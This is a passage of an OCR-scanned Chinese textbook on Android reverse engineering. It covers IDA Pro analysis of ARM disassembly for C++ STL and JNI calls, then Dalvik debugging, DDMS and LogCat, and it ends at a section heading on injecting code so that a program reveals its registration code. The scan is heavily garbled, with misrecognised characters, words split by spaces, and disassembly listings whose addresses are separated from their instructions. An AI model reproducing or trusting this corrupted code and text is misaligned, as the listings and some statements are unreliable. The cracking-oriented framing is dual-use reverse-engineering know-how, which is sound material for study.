 ZNSo3putEc ; 

 ZNSob5flushEv ; std::ostream::flush(void) 

RO, R7 ; R7 为 aclass 类 的 首 地 址 

_Zd1Pv ; cout<<endl 后 delete 删 除 a 
指针 


std: :ostream: :put (char) 


RO, #0 


SP!, (RA-R10,PC) ; 程序 返回 


这 段 代码 只 是 将 printf 输 出 改 成 了 cout 输 出 ， 但 反 汇 编 后 的 代码 阅读 起 
来 的 难度 就 比 上 一 节 要 高 出 很 多 。 首 先是 SITL 库 函数 的 识别 ，IDA Pro 在 这 


方面 非常 出 色 ， 它 识别 出 了 所 有 的 STL 库 水 数 ， 虽 然 名称 比 较 怪异 ， 不 过 旁 
边 还 是 有 注释 加 以 说 明 ， 上 面 的 代码 笔者 注释 得 比较 清楚 了 ，aclass 类 访问 
的 部 分 与 上 一 节 的 代码 相似 ， 唯 一 难以 理解 的 是 库 了 图 数 的 调用 序列 ， 这 方 
面 的 理解 完全 取决 于 读者 对 STL 代 码 的 理解 程度 ， 比 如 cout<<endl 这 句 代 码 
在 STL 源 码 中 是 这 样 的 : 


template<typename  CharT, typename _Traits> 
inline basic ostream« CharT,  Traits»& 
endl(basic ostream« CharT,  Traits»& X os) 


( return £flush( Oos.put( .os.widen('n'))); ) 
endl 实 际 上 调用 的 是 std::ostream::put(char) 与 std::ostream::flush(void)。 
此 ， 如 果 读 者 事先 知道 这 个 原理 的 话 ， 在 阅读 上 面 的 反 汇 编 代 码 时 就 能 一 
眼 找 出 endl 的 所 在 位 置 。 下 面 我 们 来 看 静态 链接 GNU STL 库 的 程序 反 汇 编 


代码 。 
.text:0000998C ; ------------------------------------------ 
.text:0000998C main ; CODE XREF: .text:loc 99 

341 j 

.text:0000998C STMFD  SP!, {R4-R10,LR} 
.text:00009990 MOV RO, #8 ; 8 字 节 为 aclass 类 的 大 小 
.text:00009994 BL _Znwj ; operator new(uint) 
.text:00009998 LDR RA, -z(, GLOBAL OFFSET TABLE  - O0x99AC) 
.text:0000999C LDR R6, -0x2BC 
.text:000099A0 LDR R1, -(aConstructorCal - 0x99CO0) 
.text:000099A4 ADD RA, PC, R4 
.text:000099A8 LDR R5, [R4,R6] 
.text:000099AC MOV R7, RO ; aclass *a 
.text:000099B0 MOV R2, $0x13 ; 需要 输出 的 字符 个 数 
.text:000099B4 MOV RO, R5 
.Ctext:000099B8 ADD Rl; PO; RI ; "Constructor called." 
.text:000099BC BL sub 1AA20 ; _ cout 输出 变 成 了 子 程序 调用 
.text:000099C0 LDR R3, [R5] 
.text:000099C4 LDR R3, [R3,$-0xC] 
.text:000099C8 ADD R3; R5, R3 
.text:000099cc LDR R8, [R3,$90x7C] 
.text:000099D0 CMP R8, #0 ; 判断 返回 的 cout 对 象 是 否 为 空 
.text:000099D4 BEQ throw badcast 


.text:000099D8 LDRB R3, [R8,4*0x1C] 


sen 


.text:00009A08 loc 9A08 


.text:00009A08 
.text:00009A0C 
.text:00009A10 
.text:00009A14 
.text:00009A18 
.text:00009A1C 
.text:00009A20 
.text:00009A24 
.text:00009A28 
.text:00009A2C 
.text:00009A30 


.text:00009A34 
.text:00009A38 
.text:00009A3C 
.text:00009A40 
.text:00009A44 


ELI 


.text:00009A8C loc 9A8C 


.text:00009A8C 
.text:00009A90 
.text:00009A94 
.text:00009A98 
.text:00009A9C 
.text:00009AA0 
. text :00009AA4 
.text:00009AA8 
.text:00009AAC 
.text:00009AD8 
.text:00009AD8 
.text:00009ADC 
.text:00009AE0 
. text :00009AE4 
. text :00009AE8 
.text:00009AEC 
.text:00009AFO0 
.text:00009AFA4 


loc 9AD8 


, 


LDR 
BL 

BL 
MOV 
BL 
MOV 
LDMFD 


; CODE XREF: .text:000099zEg4] j 


R8, [R4,R6] 
RO, R8 ; 以 下 两 行为 cout<<end1l 
sub_1A674 ; std::ostream: :put (char) 
sub 1A4A4 ; Std::ostream::flush(void) 
R3, #5 ; 5 
R3, [R7] ; a-»setM(5) 
R3, $0x61 » ues 
R3, [R7, #4] ; a->setC('a') 
R1, #0xA ; a+b=10 
RO, R8 ; R8 为 返回 的 cout 对 象 
sub 1AA1C ; cout<< 的 代码 也 变 成 子 程序 
调用 了 

RO, R8 
R1, [R7] ; R7 为 aclass 类 的 首 地 址 
sub. 1AA1C ; cout««a-»getM() 
R3, [R0] 
R8, RO 

; CODE XREF: .text:00009A68] j 
RO, R8 
sub, 1A674 ; Std::ostream::put (char) 
sub 1A4A4 ; Std: :ostream: : flush (void) 
R8, [RA4,R6] 
R1, -(aDestructorCall - 0x9ABO) 
R2, 40x12 ; 需要 输出 的 字符 个 数 
RO, R8 
Rl, PC, Ri ; "Destructor called." 
sub 1AA20 ; cout 输 出 变 成 了 子 程序 调用 


; CODE XREF: .text:00009 B14|j 
RO, [R4,R6] 


sub 1A674 ; Std::ostream::put(char) 
sub 1A4A4 ; Std::ostream::flush(void) 
RO, R7 

J ZdlPv ; operator delete(void *) 
RO, #0 


SP!, (RA-R10,PC) ; 程序 返回 


这 段 反 汇编 代码 中 ， 访 问 aclass 类 的 部 分 与 静态 链接 STL 的 代码 是 一 样 
的 ， 但 访问 STL 库 函数 的 代码 却 变 了 。 每 个 STL 库 函数 的 调用 处 都 变 成 了 一 


条 BL 指 令 ，BL 指 令 调 用 的 子 程序 都 是 相应 STL 了 加 数 的 实现 代码 ，IDA Pro 也 
没有 识别 出 它们 ， 这 样 的 话 ， 分 析 静 态 链接 STL 库 的 程序 难度 就 很 大 了 ， 除 
了 动态 调试 这 些 代 码 ， 笔 者 目前 也 没有 找到 很 好 的 解决 方案 。 


7.6 Android NDK JNI API 逆 向 分 析 


本 小 节 主 要 介绍 Android NDK 通 过 JNI (Java Native Interface) 向 开发 人 
员 提 供 的 API 函 数 ， 以 及 如 何在 IDA Pro 中 识别 它们 来 进行 下 一 步 的 分 析 。 


7.6.1 Android NDK 提 供 了 哪些 疯 数 


开发 过 Linux 平 台 上 C/C++ 程序 的 读者 来 使 用 Android NDK 开 发 原生 程序 
应 该 很 容易 上 手 ， 因 为 在 Linux 平 台 上 使 用 过 的 大 多 数 函 数 在 Android NDK 
中 都 有 提供 ， 它 们 的 声明 全 部 位 于 Android NDK 的 platforms\<android 版 本 
>\arch-arm\usninclude 目 录 中 的 头 文 件 中 ， 如 大 家 熟悉 的 stdio.h 文 件 中 就 声明 
了 常用 的 输入 输出 函数 。 

除了 直接 在 代码 中 调用 这 些 Linux 平 台 的 原生 函数 外 ，Android NDK 还 
通过 JNI 接 口 向 开发 人 员 提 供 了 一 套 JNI 接 口 阔 数 ， 通 过 这 些 国 数 ， 开 发 人 
员 可 以 在 原生 C/C++ 代码 中 与 Java 代 码 进行 数据 交换 ， 如 通过 C/C++ 代码 访 
问 Java 类 的 字段 、 调 用 Java 类 的 方法 等 。 这 项 特性 使 得 开发 人 员 使 用 
C/C++ 代码 也 能 写 出 功能 强大 的 程序 ， 甚 至 可 以 将 大 部 分 的 Java 代 码 转 移 到 
C/C++ 代码 中 来 ， 那 JNI 接 口 都 提供 了 哪些 阅 数 呢 ? 

Android NDK 的 platforms\<android 版 本 >\arch-arm\usr\include\jni.h 头 文件 
中 ， 声 明了 所 有 可 以 使 用 到 的 JNI 接 口水 数 。 该 文件 中 有 两 个 重要 的 结构 体 
JNINativeInterface 与 JNIImvokeInterface，JNINativeInterface 是 JNI 本 地 接口 ， 
实际 上 它 是 一 个 接口 函数 指针 表 ， 里 面 每 一 项 都 为 JNI 接 口 的 函数 指针 ， 所 
有 的 原生 代码 都 可 以 调用 这 些 接口 图 数 ; 而 JNIInvokeInterface 则 是 JNI 调 用 
接口 ， 该 结构 目前 只 有 3 个 保留 项 与 5 个 函数 指针 ， 这 5 个 函数 用 于 访问 全 局 
的 JNI 接 口 ， 多 用 于 原生 多 线程 程序 开发 。 既 然 JNI 为 开发 人 员 提 供 的 API 就 


在 这 两 个 接口 内 ， 那 么 掌握 了 这 些 API 的 含义 与 使 用 方法 是 不 是 就 可 以 理解 
为 掌握 了 Android NDK 开 发 了 呢 ? 笔者 认为 大 多 数 时 候 是 这 样 的。 国内 目前 
没有 一 本 讲解 Android NDK 开 发 的 好 书 ， 学 习 这 方面 知识 的 开发 人 员 多 是 通 
过 Android NDK 提 供 的 样 例 来 理解 其 使 用 方法 的 ， 就 目前 来 说 ， 在 两 种 情况 
下 会 使 用 到 Android NDK: 第 一 种 是 移植 其 它 平台 的 C/C++ 库 到 Android 程 序 
中 来 ， 这 类 程序 的 开发 分 为 三 个 阶段 ， 首 先 需 要 完成 代码 的 移植 ， 如 果 代 
码 的 可 移植 性 强 ， 不 涉及 过 多 跨 平台 问题 ， 移 植 应 该 是 比较 简单 的 ， 完 成 
这 一 步 后 就 是 原生 代码 与 Java 代 码 的 通信 ， 这 时 就 需要 编写 接口 及 数 来 实现 
了 ， 多 数 情况 下 也 不 是 很 困难 ， 在 接口 函数 中 调用 功能 代码 ， 通 过 JNI 接 口 
返回 特定 类 型 的 数据 ， 最 后 在 Java 代 码 中 调用 这 些 接口 函数 即 可 ; 另 一 种 是 
为 了 使 用 原生 代码 而 编写 原生 代码 ， 这 种 情况 多 数 是 为 了 加 强 代码 保护 ， 

防止 核心 技术 被 破解 ， 因 为 C/C++ 原生 代码 比 传统 的 Java 代 码 更 具备 抗 攻 击 
能 力 ， 当 然 也 不 排除 Android 开 发 人 员 以 前 从 事 过 C/C++ 开发 工作 ， 使 用 
C/C++ 编写 程序 更 顺手 ， 不 过 这 么 较真 的 开发 人 员 我 想 应 该 是 比较 少见 的 。 


7.6.2 ”如 何 静 态 分 析 Android NDK 程 序 


静态 分 析 Android NDK 程 序 与 分 析 传 统 的 原生 程序 有 些 不 同 ， 传 统 的 原 
生 程序 中 只 调用 了 原生 API 国 数 ， 使 用 IDA Pro 分 析 它 们 时 会 被 自动 识别 出 
来 (IDA Pro 的 flair 技 术 ) ， 因 此 分 析 的 难度 转移 到 了 理解 ARM 指 令 集 序列 
的 含义 上 。 而 Android NDK 程 序 使 用 了 JNI 接 口水 数 ， 在 分 析 它 们 时 IDA Pro 
并 不 能 识别 它们 ， 这 使 得 分 析 工 作 变 得 比较 艰难 。 通 常 ，Android NDK 程 序 
的 反 汇 编 代码 如 下 。 


EXPORT nativeMethod 


nativeMethod 

var 18- -0x18 

var 14= -0x14 

var C2 -0xC 

var 4- -4 

STR LR, [SP,svar 4]! 8 保存 返回 地 址 
SUB SP, SP, #0x14 @ 开 辟 栈 空间 

STR RO, [SP,#0x18+var_14] @ 保 存 第 一 个 参数 
STR R1, [SP,#0x18+var_18] @ 保 存 第 二 个 参数 
LDR R3, -(aFAxeNativemeth - 0x132C) @ 取 字符 串 偏 移 
ADD R3, PC, R3 @ "你 好 !NativeMethod" 

STR R3, ee 

LDR R3, [SP,#0xl8+var_14] 

LDR R3, [R3] @ 取 JNIEnv 指 针 *env 

LDR R3, [R3,#0x29C] QJ (*env) ->NewStringUTF () 地址 
LDR RO, [SP,#0x18+var_14] ”@ 第 一 个 参数 

LDR R1, [SP,#0x18+var_C] @ 第 二 个 参数 

BLX R3 @ 调 用 (*env) -»NewStringUTF () 方 法 
MOV R3, RO @ 返 回 结果 

MOV RO, R3 

ADD SP, SP, #0x14 @ 平 衡 栈 指针 

LDMFD  SP!, (PC) @ 子 程序 返回 


上 面 的 反 汇编 代码 在 调用 具体 的 JNI 接 口水 数 时 ， 逻 数 地 址 是 通过 一 个 
基于 寄存 器 的 偏 移 值 传递 过 来 的 ， 这 个 偏 移 值 是 怎么 计算 的 呢 ? 上 一 节 讲 


过 ，JNI 接 口 函 
体 里 面 ， 继 


数 指针 被 放 到 JNINativeInterface 与 JNIInvokeInterface 两 个 结构 


续 查 看 jni.h 可 以 发 现 有 如 下 一 段 声 明 。 


#if defined(  cplusplus) 
typedef  JNIEnv JNIEnv; 
typedef  JavaVM JavaVM; 
*else 
typedef const struct JNINativeInterface* JNIEnv; 
typedef const struct JNIInvokeInterface* JavaVM; 
#endif 
如 果 使 用 C++ 代码 来 调用 JNI 接 口 函 数 ，JNIEnv 被 定义 成 了 _JNIEnv 结 构 
体 ， 该 结构 体 的 第 一 个 字段 就 是 一 个 JNINativeInterface 结 构 体 的 指针 。 如 果 
是 C 代 码 调用 JNI 接 口 函 数 ，JNIEnv 则 直接 被 定义 成 JNINativeInterface 结 构 体 
的 指针 。 因 此 ， 可 以 将 JNIEnv 的 首 地址 解释 成 JNINativeInterface 的 首 地 址 来 
使 用 。 既 然 JNINativeInterface 结 构 中 存放 的 是 JNI 接 口 函 数 的 地 址 ， 那 么 通 
过 首 地 址 加 上 索引 值 是 否 就 能 够 找到 具体 的 图 数 了 呢 ? 答案 是 肯定 的 。 每 
个 地 址 占用 4 字 节 的 空间 ， 上 面 代 码 中 的 0x29C 除 以 4 等 于 167， 有 和 耐心 的 读 
者 可 以 数 一 数 ， 看 看 JNINativeInterface 结构 体 的 第 167 项 是 否 大 
NewStringUTF()o 
IDA Pro 支 持 结 构 化 的 数据 显示 ， 而 且 支 持 从 C/C++ 头 文 件 直接 导入 结 
构 体 定义 。 使 用 方法 是 : 点 击 IDA Prý% “File Load file > Parse c header 
file”， 然 后 选择 jni.h 头 文件 ， 不 过 这 样 直接 导入 会 报错 ， 需 要 简单 修改 下 
jni.h， 具 体 是 注释 掉 第 27 行 的 “#include<stdarg.h>”， 还 有 将 1122 行 的 “#define 
JNIEXPORT _attribute__ ((visibility ("default")))” Pk PÈ “#define 
JNIEXPORT”， 修 改 完 成 后 就 可 以 成 功 导 入 了 (记得 导入 成 功 后 将 jni.h 文 件 
修改 回去 ， 否 则 ， 编 译 NDK 程 序 时 会 出 错 ) 。 现 在 点 击 IDA Pro 主 界面 上 的 
Structures 选 项 卡 ， 然 后 按 下 Insert 键 打开 “create structure/union” 对 话 框 ， 点 
击 界面 上 的 “Add standard structure” 按 钮 ， 在 打开 的 结构 体 选择 对 话 框 中 选 
择 JNINativeInterface 并 点 击 OK 返回 ， 按 照 上 面 的 操作 把 JNIInvokeInterface 结 
构 体 也 导入 进来 。 下 面 回 到 IDA Pro 的 反 汇 编 代 码 界面 ， 在 0x29C 所 在 的 代 
码 行 上 点 击 右键 ， 会 出 现 如 图 7-19 所 示 的 菜单 选项 ，IDA Pro 成 功 解析 出 了 
0x29C 为 JNINativeInterface 的 NewStringUTEFO 国 数 。 


A IDA — Y:XworkspaceXchapterTVXT. 67. 6. 2VjnimethodsVlibsVarmeabiVlibjnimethods. 
File Edit Jump Search View Options Windows Help 


$ j e A*55 is Z9 shohgtc-€44uix»o0d s 
| pen I m : 
A Functions window Bx [7] IDA View £3 [O] Hex View [A] Structures | 88 了 Inports E Exports 
Function nam var - 14= -0x14 ] 
var €£- -0xC | 
var h- -4 | 
STR LR, [SP,tivar 4]f | 
SUB SP, SP, #9x14 | 
STR RB，[SP ,#8x18+var 14] 
STR R1, [SP,#0x18+var_18] | 
LDR R3, S IF RKEHaCLURNCER - 8x132€) 
ADD R3, PC, R3 T y tNativeMethc 

| STR R3, [SP ,#8x18+uar c] 

nan LDR R3, [SP ,#8x18+var_14] 

Fal LDR R3, [R3] 

"EE — uà ffer PT LDR R3, [R3,#8x2n° 

Ie Ens " LDR R8, [SP ,#8x12 W Group nodes 

Line 17 of 82 z pos Bh [SP ROKE U Fan to operand Enter 

dii Graph pey 8 x MOU R3, R8 © Jump in a new window AltEnter 
MOU RO, R3 图 Jump i w hex window 

- ADD SP, SP, #8x1 ÑN Xrefs fron 
LDMFD — SP*, (PC) [R3, #JNINativeInterface NewStringUTF] 
; End of Function naf) Use standard symbolic constant 
 —— S 
100.00 (-284,133) (446,217) 00001334 00001334: nativeMethodt24 M [R3, $666] A 
Pa] [R3, #01234] 

DE utpu Èz] [ga, 01010011100] B 8x 
[e Urum IiicOlT8CULCJU TMHULUIGTZUM PCNU UTCYIUCTIUuriuU M ira nun 1 
ed astoa. 'main' 54] id 
Compiling file 'C: VD Files \VStart50\Android\ IDA Demo 6.2\idc\onload. idc' F Edit funct AlttP 
Executing function 'OnLoad'. =æ Hidi Ctrlt 
IDA is analysing the input file... E) Tet 
You may start to explore the input file right now. Lu 
Propagating type information... d Pro id: 

Function argument information has been propagated X Undef v 

The initial autoanalysis has been finished. Synchronize with d y 
IDC Copy address to command line | 

AU: idle Dom Disk: 18GB 


图 7-19 ”使 用 IDA Pro 静 态 分 析 Android NDK 程 序 


考虑 到 很 多 读者 对 Android NDK 的 JNI 接 口 函 数 不 太 熟悉 ， 笔 者 为 本 小 
节 编 号 了 jnimethods 实 例 ， 其 中 的 原生 代码 对 JNI 接 口 提 供 的 大 部 分 函数 都 
有 引用 到 ， 读 者 可 以 结合 该 实例 的 代码 来 逆向 分 析 libjnimethods.so 文 件 。 


77 “本 章 小 结 


本 章 主要 介绍 了 Android NDK 生 成 的 原生 程序 的 程序 特点 ， 以 及 如 何 使 
用 IDA Pro 来 静态 分 析 它 们 。 分 析 原 生 程 序 的 难度 较 高 ， 除 了 涉及 本 身 反 汇 
编 代 码 中 众多 的 ARM 指 令 外 ， 还 有 大 量 的 库 函 数 的 反 编 代码 也 参与 其 中 ， 
如 何 区 分 它们 是 提高 分 析 效 率 的 关键 ， SR 行 介 绍 ， 
因为 这 些 都 需要 分 析 人 员 在 日 积 月 累 的 经 验 中 进行 不 断 的 总 结 。 此 外 ， 有 
时 候 反 汇编 代码 远 远 比 想象 中 要 复杂 得 多 ， 数据 加 密 、 


数据 解密 等 让 分 析 人 员 很 难 整 理 出 分 析 思 路 ， 这 时 候 就 需要 使 用 动态 调试 
技术 了 ， 这 也 是 我 们 下 一 章 将 要 介绍 的 内 容 。 


第 8 章 ”动态 调试 Android 程 序 


软件 调试 可 分 为 源码 级 调试 与 汇编 级 调试 。 源 码 级 调试 多 用 于 软件 开 
发 阶段 ， 开 发 人 员 拥 有 软件 的 源码 ， 可 以 通过 集成 开发 环境 (如 Android 开 
发 使 用 的 Eclipse) 中 的 调试 器 跟踪 运行 自己 的 软件 ， 解 决 软件 中 的 错误 ; 
汇编 级 调试 也 就 是 本 章 所 说 的 动态 调试 ， 它 多 用 于 软件 的 逆向 工程 ， 分 析 
人 员 通 常 没 有 软件 的 源 人 代码， 调试 程序 时 只 能 跟踪 与 分 析 汇 编 代码 ， 查 看 
寄存 器 的 值 ， 这 些 数据 远 远 没有 源码 级 调试 展示 的 信息 那么 直观 ， 但 动态 
调试 程序 同样 能 够 跟踪 软件 的 执行 流程 ， 反 馈 程 序 执行 时 的 中 间 结 果 ， 在 
静态 分 析 程 序 难以 取得 突破 时 ， 动 态 调 试 也 是 一 种 行 之 有 效 的 逆向 手段 。 

动态 调试 Android 程 序 分 为 动态 调试 Android SDK 程 序 与 动态 调试 
Android 原 生 程序 ， 本 章 将 主要 介绍 在 没有 源码 的 情况 下 ， 如 何 使 用 调试 器 
动态 调试 这 两 种 程序 。 


8.1 Android 动态 调试 支持 


Android 程 序 的 调试 分 为 Android SDK 开 发 的 “java” 程 序 调试 与 Android 
NDK 开 发 的 原生 程序 调试 。*java” 程 序 使 用 Dalvik 虚 拟 机 提供 的 调试 特性 来 
进行 调试 。 

Dalvik 虚 拟 机 的 最 初版 本 就 加 入 了 对 调试 的 支持 ， 为 了 做 到 与 传统 Java 
代码 的 调试 接口 统一 ，Dalvik 虚 拟 机 实现 了 JDWP (Java Debug Wire 
Protocol，Java 调 试 有 线 协 议 ) ， 可 以 直接 使 用 支持 JDWP 协 议 的 调试 器 来 调 
试 Android 程 序 ， 如 Java 开 发 人 员 所 熟悉 的 jdb、Eclipse、IntelliJ 与 JSwat。 但 
正如 Dalvik 虚 拟 机 的 设计 初衷 那样 ，Dalvik 并 非 为 Java 而 生 ， 它 是 Android 的 
一 部 分 ，Dalvik 并 不 支持 JVMTI (Java Virtual Machine Tool Interface ，Java 虚 
拟 机 工具 接口 )。 


Dalvik 虚 拟 机 为 JDWP 的 实现 加 入 了 DDM (Dalvik Debug Monitor , 
Dalv 阔 调试 监视 器 ) 特性 。 具 体 的 实现 有 DDMS (Dalvik Debug Monitor 
Server，Dalvik 调 试 监视 器 服务 ) 与 Eclipse ADT 插 件 。Dalvik 虚 拟 机 中 所 有 
对 调试 支持 的 实现 代码 位 于 Android 系 统 源码 的 dalvik/vnvjdwp 目 录 下 ， 它 的 
实现 在 Dalvik 虚 拟 机 源码 中 是 相对 独立 的 ， 其 中 dalvik/vm/Debugger.c 建 立 起 
了 Dalv 冰 虚拟 机 与 JDWP 之 间 的 通讯 桥梁 。 这 么 做 的 好 处 是 便于 在 其 他 项 目 
中 复 用 JDWP 的 代码 。 

每 一 个 启用 调试 的 Dalvik 虚 拟 机 实例 都 会 启动 一 个 JDWP 线 程 ， 该 线程 
一 直 处 于 空闲 状态 ， 直 到 DDMS 或 调试 器 连接 它 ， 该 线程 只 负责 处 理 调试 
器 发 来 的 请 求 ， 而 Dalvik 虚 拟 器 发 起 的 通信 〈 例 如 当 Dalvik 虚 拟 机 遇 到 断 点 
中 断 时 通知 调试 器 ) 都 由 相应 的 线程 发 出 。 

当 Dalvik 虚拟 机 从 Android 应 用 程序 框架 中 启动 时 ， 系 统 属 性 
ro.debuggable 为 1 (可 使 用 命令 “adb shell getprop ro.debuggable” 来 检查 它 ) 
时 所 有 的 程序 都 会 开启 调试 支持 ; 若 为 0， 则 会 判断 程序 的 
AndroidManifest.xml , 如 ZR <application> 元 素 中 包含 了 
android:debuggable="true" 则 开启 调试 支持 。 Android AVD 生 成 的 模拟 器 默认 
情况 下 ro.debuggable 被 设置 成 7， 系统 中 所 有 的 程序 都 是 可 调试 的 。 

原生 程序 则 使 用 传统 的 Linux 程 序 调 试 方法 如 GNU 调 试 服务 器 来 连接 进 
行 调试 。 原 生 程 序 分 为 动态 链接 库 与 普通 可 执行 程序 两 种 。 前 者 大 多 内 置 
于 Android 程 序 中 ， 在 调试 时 需要 先 启 动 Android 程 序 加 载 它 ， 然 后 使 用 远程 
附加 的 方式 来 调试 ， 后 者 则 没有 这 个 限制 ， 可 以 直接 使 用 远程 运行 的 方式 
来 调试 它 。 


8.2 DDMS 的 使 用 


使 用 DDMS 可 以 监视 Android 程 序 运 行 时 的 运行 状态 与 结果 ， 在 动态 分 
析 Android 程 序 的 过 程 中 ， 合 理 使 用 DDMS 可 以 大 大 提高 分 析 效 率 。 


8.2.1 ”如 何 启动 DDMS 


DDMS 的 全 名 是 Dalvik 虚 拟 机 调试 监控 服务 。 它 提供 了 设备 截屏 、 查 看 
运行 的 线程 信息 、 文 件 浏 览 、Logcat、Method Profiling、 广 播 状 态 信息 、 模 
拟 电话 呼叫 、 接 收 SMS、 虚拟 地 理 坐 标 等 功能 。 它 是 Android SDK 提 供 的 一 
款 工 具 。 在 Android SDK 的 tools 目 录 下 ， 有 一 个 ddms.bat 脚 本 ， 它 就 是 
DDMS 的 启动 文件 ， 直 接 双 击 该 文件 即 可 启动 DDMS。 如 果 安 装 了 Eclipse， 
并 且 配 置 好 了 Android SDK 与 ADT 插 件 ，DDMS 就 会 集成 到 Eclipse 中 ， 可 以 
点 击 菜单 项 <wWindow > Open Perspective ~ DDMS” 打 开 它 。DDMS 启 动 后 的 
界面 如 图 8-1 所 示 。 


£— DDES — Eclipse 


ze Date Time 
3B Android2.3.3 e mulator-55' Onlin * > ace 2012-09-09 08:38 
M r E dia 2010-09-06 12:28 
com. android. deskclock 236 由 Ey confi 2012-09-09 08:38 

android. pr s.media 206 2012-09-09 08:38  lrwxrwxrwx 
mU em rocess.acore 172 3j CB data 2012-09-09 08:42 
com. android. protips 281 efa 1 1970-01-01 00:00 
com. android. developmen 292 由 EE de 2012-09-09 08:41 

jp. co. omronsoft. openwn 115 etc 2012-08-09 08:38 rwxrwxrwx 
com. android. emai ini 94168 1970-01-01 00:00 
com. android. launcher init. go 1677 1970-01-01 00:00 

com. android. systemui 13805 1970-01-01 00:00  -rwxr-x 

com. android. quicksearc 由 [C nn 2012-09-09 08:38 
system process © proc 1970-01-01 00:00 
com. androi one 由 (BS roo 2010-01-28 00:59 
< 局 sbin 1970-01-01 00:00 


Lola Z 


Saved Filters 中 erbose 加 | A & D4 
All messages (no filt 


. Time Application ET Text ^ 
09-09 08:59:48.487 com.android.launcher dalvikvm Debugger has detached; 
09-09 08:59:48.487 con. android. systemui ^ dalvikvm Debugger has detached; 
09-09 08:59:48.497 2 com. android. quicks... dalvikvm Debugger has detached; 
09-09 08:59:48.497 system_process dalvikvm Debugger has detached; 
09-09 08:59:48.497 3 com. android. phone dalvikvm Debugger has detached; 
09-09 09:00:20.437 system process SntpClient request time failed: ja 

rotocol v 


> 


图 8-1 DDMS 启 动 界面 


DDMS 功 能 强大 ， 在 很 多 Android 开 发 书籍 中 都 有 介绍 ， 在 本 章 介 绍 区 
Android 动 态 分 析 技 术 中 ， 它 的 文件 浏览 、LogCat poo Profiling 是 使 
用 最 多 的 功能 。 文 件 浏览 可 以 查看 需要 分 析 的 程序 在 安装 目录 下 生成 的 文 
ft. 分析 这 些 文件 的 内 容 可 以 对 程序 的 设置 及 生成 的 数据 有 初步 的 了 解 ， 


LogCat 则 可 以 输出 软件 运行 时 的 调试 信息 ， 而 Method Profiling 用 于 跟踪 程 
序 的 执行 流程 。 


8.2.2 ”使 用 LogCat 查 看 调试 信息 


Android SDK 提 供 了 android.util.Log 类 来 输出 调试 信息 ， 如 下 面 这 行 代 
B5: 


Log.v("com.droider.jnimethods", "jni test a void subclass method. this run 


in java"); 

android.util.Log 提 供 了 Log.vO0、Log.d0、Log.i0、Log.w0O 以 及 Log.e0 等 
5 个 调试 信息 输出 方法 。 其 中 v 表 示 输 出 VERBOSE 类 型 的 信息 ，d 表 示 输 出 
DEBUG 类 型 的 信息 ，i 表 示 输 出 INFO 类 型 的 信息 ，w 表 示 输 出 WARN 类 型 的 
信息 ，e 表 示 输 出 ERROR 类 型 的 信息 。 第 1 个 字符 串 参 数 
“com.droiderjnimethods” 为 调试 信息 的 Tag 标 记 ， 第 2 个 字符 串 参 数 为 调试 信 
RB. 

DDMS 提 供 了 LogCat 窗 口 来 显示 android.util.Log 类 的 输出 信息 。 在 使 用 
LogCat 窗 口 查 看 调试 信息 前 ， 需 要 先 配 置 LogCat 消 息 过 滤器 ， 点 击 LogCat 
窗口 左边 的 绿色 加 号 按钮 ， 打 开 LogCat 消 息 过 滤器 设置 对 话 框 ， 在 Filter 
Name 一 栏 中 输入 过 滤器 的 名 称 如 “jnimethods”。 过 滤器 可 以 根据 Log 标 签 

(Log Tag) 、Log 消 息 (Log Message) 、 进 程 ID (PID) 、 程 序 名 
(Application Name) 、Log 等 级 (Log Level) 来 设 定 要 过 滤 的 调试 信息 。 
Log 标 签 为 Log 类 调试 信息 输出 方法 的 第 一 个 参数 ; Log 消息 为 具体 的 消息 内 
A; PID 为 程序 运行 时 的 进程 ID; 程序 名 为 软件 的 包 名 ; Log 等 级 分 为 六 大 
类 : verbose、debug、info、warn、error、assert。 其 中 verbose 表 示 输 出 所 有 
调试 信息 ， 包 括 VERBOSE 、DEBUG 、INFO 、WARN ERROR, 
ASSERT。debug 输 出 DEBUG、INFO、WARN、ERROR 调 试 信息 。info 输 出 
INFO、WARN、ERROR 调 试 信息 。wam 输 出 WARN 和 ERROR 调 试 信 息 。 
error 只 输出 ERROR 调 试 信息 。assert 输 出 Assert 类 的 断言 信息 。 如 图 8-2 所 

示 ， 本 实例 添加 了 一 个 Tag 标 签 为 “com.droiderjnimethods” 的 消息 过 滤器 。 


Logcat Message Filter Settings 


Filter logcat messages by the source's tag, pid or minimum log level 
Empty fields will match all messages. 


jnimethods 


Filter Name: 


by Log Tag: com. droider. jnimethods 
by Log Message: 
by PID: 
by Application Name: 


by Log Level: 


图 8-2 ”设置 LogCat 消 息 过 滤器 


设置 好 LogCat 消 息 过 滤器 后 ， 运 行 7.6.2 节 的 jnimethods 实 例 ， 如 图 8-3 所 
示 ， 所 有 标签 为 “com.droiderjnimethods” 的 Log 信 息 都 会 在 LogCat 窗 口中 显 
示 出 来 。 


EB Lograt X 


El Console 


Saved Filters db == 


- j|verbess wj A RO) E 


no filters) (21) u LL 
imethods (Session Filt L... Time PID TID Tag Text A 
I 09-09 10:03:35.338 2035 2035 System.out debugger has settled (1340) 
Y 09-09 10:03:35.338 2035 2035 com.droider.... GetVersion() --» jni version:10006 
Y 09-09 10:03:35.347 2035 2035 com.droider.... GetStringUTFChars() --> MODEL: sdk 
v 09-09 10:03:35.347 2035 2035 com.droider.... GetStaticFieldID() --» sdk 
Y 09-09 10:03:35.347 2035 2035 com.droider.... ReleaseStringUTFChars() --» sdk 
ki 09-09 10:03:35.357 2035 2035 com.droider.... GetÜbjectField(] --» aStringField:abc - 
{v 
< < > 


图 8-3 ”使 用 LogCat 窗 口 查看 程序 运行 结果 


注意 
除了 使 用 LogCat 外 ， 还 可 以 使 用 命令 行 方式 查看 Log 输 出 ， 具 体 的 方法 是 在 


“adb logcat -s com.droider.jnimethods:V”， 输 出 的 结果 与 LogCat 窗 口 是 一 样 的 。 


命令 提示 符 下 执行 


8.3 ”定位 关键 代码 


本 小 节 介 绍 的 定位 关键 代码 的 方法 与 第 5 章 介绍 的 静态 定位 方法 不 同 ， 
这 里 主要 是 通过 运行 要 分 析 的 程序 ， 观 察 程序 的 输出 结果 来 判断 程序 的 关 
TE ro 


8.3.1 ”代码 注入 法 一 一 让 程序 自己 吐出 注册 码 


通常 ， 一 个 程序 在 发 布 时 不 会 保留 Log 输 出 信息 ， 要 想 在 程序 的 特定 位 
置 输 出 信息 还 需要 手动 的 进行 代码 注入 。 所 谓 的 代码 注入 是 指 首 先 反 编译 
Android 程 序 ， 然 后 在 反 汇编 出 的 smali 文 件 中 添加 Log 调 用 的 代码 ， 最 后 重 
新 打包 程序 运行 来 查看 输出 结果 。 

